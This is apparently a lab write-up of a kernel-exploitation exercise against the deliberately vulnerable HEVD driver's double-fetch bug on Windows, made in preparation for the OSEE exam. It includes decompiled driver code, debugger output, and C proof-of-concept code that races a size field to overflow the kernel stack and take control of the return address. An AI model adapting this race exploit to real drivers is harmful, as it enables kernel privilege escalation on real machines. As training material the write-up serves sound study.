HEVD Double-fetch Walkthrough on Windows 2022

Introduction

At the time of writing I am studying towards attempting the OffSec OSEE exam, and will probably take it more than once! I realised I know very little about race conditions and so decided to take on the Double-fetch vulnerability in the Hacksys Extreme Vulnerable Driver.

A double fetch is a type of race condition vulnerability. It occurs when a program, typically in the kernel, fetches data from user space more than once without ensuring the integrity of the data between the fetches. This provides an opportunity for an attacker to alter the data between the two fetches, exploiting the time window between the two operations. This gap between the two fetches creates a window of opportunity for exploitation, making it a form of time-of-check-to-time-of-use (TOCTOU) vulnerability.

I have briefly written about kernel debugging before, so will not do so here.

Gathering Information

Let’s start by finding the Symlink and dispatch routines; We will use the symlink to communicate with the driver from user mode and IOCTLs will direct our buffer to the correct dispatch routine and from there we can look for the bug.

Using WinDbg, whilst debugging the remote kernel we find the IRP_MJ_DEVICE_CONTROL dispatch function:

1: kd> .reload
Connected to Windows 10 20348 x64 target at (Sun Sep 29 17:57:35.528 2024 (UTC + 1:00)), ptr64 TRUE
Loading Kernel Symbols
...
1: kd> lm
Browse full module list
start             end                 module name
...
fffff800`15f30000 fffff800`15fbc000   HEVD       (deferred)             
1: kd> !drvobj \Driver\HEVD 2
Driver object (ffff828630c6be30) is for:
Unable to load image \??\C:\Users\Administrator\Desktop\HEVD\HEVD.sys, Win32 error 0n2
 \Driver\hevd

...
[0e] IRP_MJ_DEVICE_CONTROL              fffff80015fb5078	HEVD+0x85078
...

To find the the symlink we can use IDA and start by looking in the DriverEntry function (I renamed the call to HEVDDriverSetup):

000000000008A134 public DriverEntry
000000000008A134 DriverEntry proc near
000000000008A134
000000000008A134 arg_0= qword ptr  8
000000000008A134
000000000008A134 mov     [rsp+arg_0], rbx
000000000008A139 push    rdi
000000000008A13A sub     rsp, 20h
000000000008A13E mov     rbx, rdx
000000000008A141 mov     rdi, rcx
000000000008A144 call    __security_init_cookie
000000000008A149 mov     rdx, rbx
000000000008A14C mov     rcx, rdi
000000000008A14F call    HEVDDriverSetup
000000000008A154 mov     rbx, [rsp+28h+arg_0]
000000000008A159 add     rsp, 20h
000000000008A15D pop     rdi
000000000008A15E retn
000000000008A15E DriverEntry endp

Following this call takes us to the next code block:

000000000008A000 mov     [rsp-8+arg_0], rbx
000000000008A005 mov     [rsp-8+arg_8], rdi
000000000008A00A push    rbp
000000000008A00B mov     rbp, rsp
000000000008A00E sub     rsp, 60h
000000000008A012 and     [rbp+arg_10], 0
000000000008A017 lea     rdx, aDeviceHacksyse ; "\\Device\\HackSysExtremeVulnerableDriver"
...

This looks suspiciously like the symlink!

IOCTL

Now I needed to find the I/O Control Code for the double-fetch bug. In reality this isn’t going to be simple in a real-world scenario, but I’m here to learn how to exploit a double-fetch bug, not reverse engineer the driver binary.

I decompiled the assembly in IDA and found this:

case 0x222037:
  DbgPrintEx(0x4Du, 3u, "****** HEVD_IOCTL_DOUBLE_FETCH ******\n");
  v6 = DoubleFetchFunction(a2, v2);
  v7 = "****** HEVD_IOCTL_DOUBLE_FETCH ******\n";

I renamed the function that v6 points to, this was sub_86800 (which conveniently means the sub routine at an offset of 0x86800 from the base address of the module).

Following a few calls that the HEVD code uses to set up each bug I land here:

__int64 __fastcall sub_8681C(const void **a1)
{
  unsigned __int64 v2; // r9
  char v4[2048]; // [rsp+20h] [rbp-808h] BYREF

  sub_1500(v4, 0LL, 2048LL);
  ProbeForRead(a1, 16LL, 1LL);
  DbgPrintEx(0x4Du, 3u, "[+] UserDoubleFetch: 0x%p\n", a1);
  DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", v4);
  DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%X\n", 2048LL);
  DbgPrintEx(0x4Du, 3u, "[+] UserDoubleFetch->Buffer: 0x%p\n", *a1);
  DbgPrintEx(0x4Du, 3u, "[+] UserDoubleFetch->Size: 0x%X\n", a1[1]);
  v2 = (unsigned __int64)a1[1];
  if ( v2 <= 0x800 )
  {
    DbgPrintEx(0x4Du, 3u, "[+] Triggering Double Fetch\n");
    RtlCopyMemory(v4, *a1, a1[1]);
    return 0LL;
  }
  else
  {
    DbgPrintEx(0x4Du, 3u, "[-] Invalid Buffer Size: 0x%X\n", v2);
    return 3221225485LL;
  }
}

Reversing and Tidying Up

Microsoft documentation states that “the ProbeForRead routine checks that a user-mode buffer actually resides in the user portion of the address space, and is correctly aligned”. At this point I’m not getting overly concerned with this!

I reversed the immediate function before the call to sub_8681C using the Vergilius Project to understand the variables being sent to the vulnerable function:

__int64 __fastcall DoubleFetchFunction(__int64 Irp, __int64 CurrentStackLocation)
{
  const void **Type3InputBuffer; // rcx
  __int64 result; // rax

  Type3InputBuffer = *(const void ***)(CurrentStackLocation + 0x20);
  result = 0xC0000001LL;
  if ( Type3InputBuffer )
    return sub_8681C(Type3InputBuffer);
  return result;
}

From this we can ascertain that a buffer that we control is being sent. Removing all of the debug statements, we are left with:

__int64 __fastcall sub_8681C(const void **InputBuffer)
{
  const void *SizeOfBuffer; // r9

  // creating a kernel buffer on the stack (not sure why the type is __m128i)  
  __m128i KernelBuffer[128]; // [rsp+20h] [rbp-808h] BYREF  <-- eagle eyes will notice that a buffer of size 0x808 will overwrite the return address

  // not 100% but this looks like a call to memset (zeroing out 0x800 bytes)?
  maybe_memset((__m128 *)KernelBuffer, 0, 0x800uLL);

  // this checks that our input buffer is mapped to user mode
  ProbeForRead(InputBuffer, 16LL, 1LL);

  // the size we provide is taken and checked to ensure it is <= 0x800
  SizeOfBuffer = InputBuffer[1];
  if ( (unsigned __int64)SizeOfBuffer <= 0x800 )
  {
    // here is the bug, instead of using SizeOfBuffer to make the copy
    // InputBuffer[1] is being fetched again (this is the double fetch)
    RtlCopyMemory(KernelBuffer, (unsigned __int64)*InputBuffer, (unsigned __int64)InputBuffer[1]);
    return 0LL;
  }
  else
  {
    return 0xC000000DLL;;
  }
}

It looks like we can try to win a race between the if statement and the RtlCopyMemory statement:

Screenshot 2024-10-02 at 16 38 41

The plan is to create a user space buffer of say 0xc00 bytes, send the a pointer to this InputBuffer[0] and a size of 0x800 in InputBuffer[1], then somehow change the buffer size in the struct to 0xc00. We will set up a basic PoC with what we know first. The SendIOCTL thread will also trigger the kernel dispatch routine.

Proof of Concept

Let’s start with a proof of concept with which to test connectivity:

#include <stdio.h>
#include <Windows.h>

struct UserData {
    LPVOID pBuffer;
    size_t sizeOfData;
};

int main() {
    printf("HEVD Double Fetch Exploit\n=========================\n");

    // get a handle to the driver
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Unable to get a handle for the driver: %d\n", GetLastError());
        return 1;
    }

    // allocate the user space buffer
    userBuffer = (char*)malloc(sizeof(char*) * 0xc00);
    memset((void*)userBuffer, 0x41, 0xc00);

    // struct to send to the driver
    UserData userData;
    userData.pBuffer = userBuffer;
    userData.sizeOfData = 0x800;

    // send our data
    BOOL status = DeviceIoControl(hDriver, 0x222037, (LPVOID)&userData, sizeof(userData), NULL, 0, NULL, NULL);

    // output the status
    printf("[+] status, when buffer size is 0x800: %d\n", status);

    // send our data, with larger buffer size
    userData.sizeOfData = 0x1500;
    status = DeviceIoControl(hDriver, 0x222037, (LPVOID)&userData, sizeof(userData), NULL, 0, NULL, NULL);

    // output the status
    printf("[+] status, when buffer size is 0x1500:%d\n", status);
}

Here we test the driver by creating a user space buffer of 0x1500 bytes. First we send the struct that points to our data with a sizeOfData field value of 0x800 and then we send the same struct but this time with a sizeOfData field value of 0x1500:

HEVD Double Fetch Exploit
=========================
[+] status, when buffer size is 0x800: 1
[+] status, when buffer size is 0x1500:0

Looking at the assembly for the function, we see that rcx is moved in to rdi at offset 0x86838, rcx should hold our struct at the start of the function.

000000000008681C mov     rax, rsp
000000000008681F mov     [rax+8], rbx
0000000000086823 mov     [rax+10h], rsi
0000000000086827 mov     [rax+18h], rdi
000000000008682B mov     [rax+20h], r14
000000000008682F push    r15
0000000000086831 sub     rsp, 820h
0000000000086838 mov     rdi, rcx

Let’s put a breakpoint at offset HEVD+0x8681c and run the code again:

1: kd> g
Breakpoint 0 hit
HEVD+0x8681c:
fffff801`296d681c 488bc4          mov     rax,rsp
1: kd> dq poi(rcx)
0000012e`673aeff0  41414141`41414141 41414141`41414141
0000012e`673af000  41414141`41414141 41414141`41414141
0000012e`673af010  41414141`41414141 41414141`41414141
0000012e`673af020  41414141`41414141 41414141`41414141
0000012e`673af030  41414141`41414141 41414141`41414141
0000012e`673af040  41414141`41414141 41414141`41414141
0000012e`673af050  41414141`41414141 41414141`41414141
0000012e`673af060  41414141`41414141 41414141`41414141

This output shows that the struct passed in to the kernel points at our buffer. We can also show the value of the sizeOfData field:

1: kd> dd rcx+8 L1
00007ff7`4d094628  00000800

Perfect! Now we know that the PoC is working we can move on to the tricky next phase, which is triggering the bug by winning a race!

Winning the Race

I decided to create two threads, one for sending the normal IOCTL that should pass the buffer length check, and a second thread to try and change the buffer size before the copy operation; this is the race condition I am trying to win. To do this I set the structure changing thread to run a loop 100 times:

// this is the function trying to win the race
DWORD WINAPI ChangeStruct(void* args)
{
    for (int i = 1; i < 100; i++)
    {
        userData.sizeOfData = 0xc00;
    }
    return NULL;
}

// this is the function sending the IOCTL
DWORD WINAPI SendIOCTL(void* args)
{
    userData.pBuffer = userBuffer;
    userData.sizeOfData = 0x800;
    BOOL status = DeviceIoControl(hDriver,
        0x222037, (LPVOID)&userData, sizeof(userData), NULL, 0, NULL, NULL);

    return NULL;
}

My logic was that if there was a single thread changing the structure 100 times, then hopefully the IOCTL calling thread would drop in between two of these and I would win the race. To make things nice and simple I used global variables, rather than passing pointers between threads (which I will probably tidy up for the final exploit):

// global variables
UserData userData;
char* userBuffer;
HANDLE hDriver;

I done a little bit of research around race conditions and I read some different texts around changing the threads priority and setting the processor affinity for each thread. I did this, but was curious to see if the race could be won without doing this, and it turns out it can. Here’s the main snippets of my code:

int main() {
    // omitted for brevity ...
    while(TRUE)
    {
        HANDLE handles[2] = { 0 };

        // send the initial IOCTL
        HANDLE tIOCTL = CreateThread(NULL,
            NULL, SendIOCTL, NULL, CREATE_SUSPENDED, NULL);

        // try to win the race
        HANDLE tChangeStruct = CreateThread(NULL,
            NULL, ChangeStruct, NULL, CREATE_SUSPENDED, NULL);

        handles[0] = tIOCTL;
        handles[1] = tChangeStruct;

        ResumeThread(tChangeStruct);
        ResumeThread(tIOCTL);

        // wait for threads
        WaitForMultipleObjects(2, handles, true, INFINITE);
    }
}

Notice that my loop will run forever, this isn’t going to be a good strategy when it comes to escalating privileges, I will need some way to detect that the race had been won, I decided to think about that later. My focus for now was to win the race and overwrite the return address on the kernel stack.

I ran the code on the target whilst my kernel debugger was attached, and after a few minutes I got a crash:

1: kd> g
Access violation - code c0000005 (!!! second chance !!!)
HEVD+0x86952:
fffff800`15fb6952 c3              ret
0: kd> k L5
 # Child-SP          RetAddr               Call Site
00 fffff68f`df25a788 41414141`41414141     HEVD+0x86952
01 fffff68f`df25a790 41414141`41414141     0x41414141`41414141
02 fffff68f`df25a798 41414141`41414141     0x41414141`41414141
03 fffff68f`df25a7a0 41414141`41414141     0x41414141`41414141
04 fffff68f`df25a7a8 41414141`41414141     0x41414141`41414141

Boom! I had triggered the bug and forced a buffer overflow on the stack. My next goal was to control rip with a ROP gadget.

Controlling RIP

I ran the PoC again but this time copied an msf-pattern_create buffer into the user mode buffer:

char pattern[] = "Aa0Aa1Aa2Aa3Aa4Aa5 // ... 0xc00 bytes
memcpy_s(userBuffer, 0xc00, pattern, 0xc00);

I walked the dog, waiting for the race condition to trigger the bug… race conditions can take time…

When the bug triggered I got a rather unhelpful bugcheck in Windows:

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

UNEXPECTED_KERNEL_MODE_TRAP (7f)

So I examined the call stack anyway:

kd> k
 # Child-SP          RetAddr               Call Site
ffffcd00`e325e508 fffff800`10f549d2     nt!DbgBreakPointWithStatus
...
fffff68f`ded9c788 37714336`71433571     0xfffff800`15fb6952
fffff68f`ded9c790 72433971`43387143     0x37714336`71433571
fffff68f`ded9c798 43327243`31724330     0x72433971`43387143
fffff68f`ded9c7a0 35724334`72433372     0x43327243`31724330

Way down the stack I found something that looked like my pattern, so I checked out the value at position 23:

msf-pattern_offset -l 0xc00 -q 3771433671433571  
[*] Exact match at offset 2056

I changed the PoC to see if I could overwrite the return address on the stack with 0x4242424242424242, if this was successful then I had found the offset of the return address overflow:

userBuffer = (char*)malloc(sizeof(char*) * 0xc00);
memset((void*)userBuffer, 0x41, 0xc00);
memset((void*)(userBuffer + 2056), 0x42, 0x8);

Another cup of coffee… race conditions can take time…

kd> g
Access violation - code c0000005 (!!! second chance !!!)
fffff800`15fb6952 c3              ret
kd> k L5
 # Child-SP          RetAddr               Call Site
fffff68f`ded8e788 42424242`42424242     0xfffff800`15fb6952
fffff68f`ded8e790 41414141`41414141     0x42424242`42424242
fffff68f`ded8e798 41414141`41414141     0x41414141`41414141
fffff68f`ded8e7a0 41414141`41414141     0x41414141`41414141
fffff68f`ded8e7a8 41414141`41414141     0x41414141`41414141

There we have it, control of the return address at a buffer offset of 0x808, directly after the intended buffer size. In Part 2 I will attempt to get privilege escalation and restore the thread gracefully.

Home : Part 2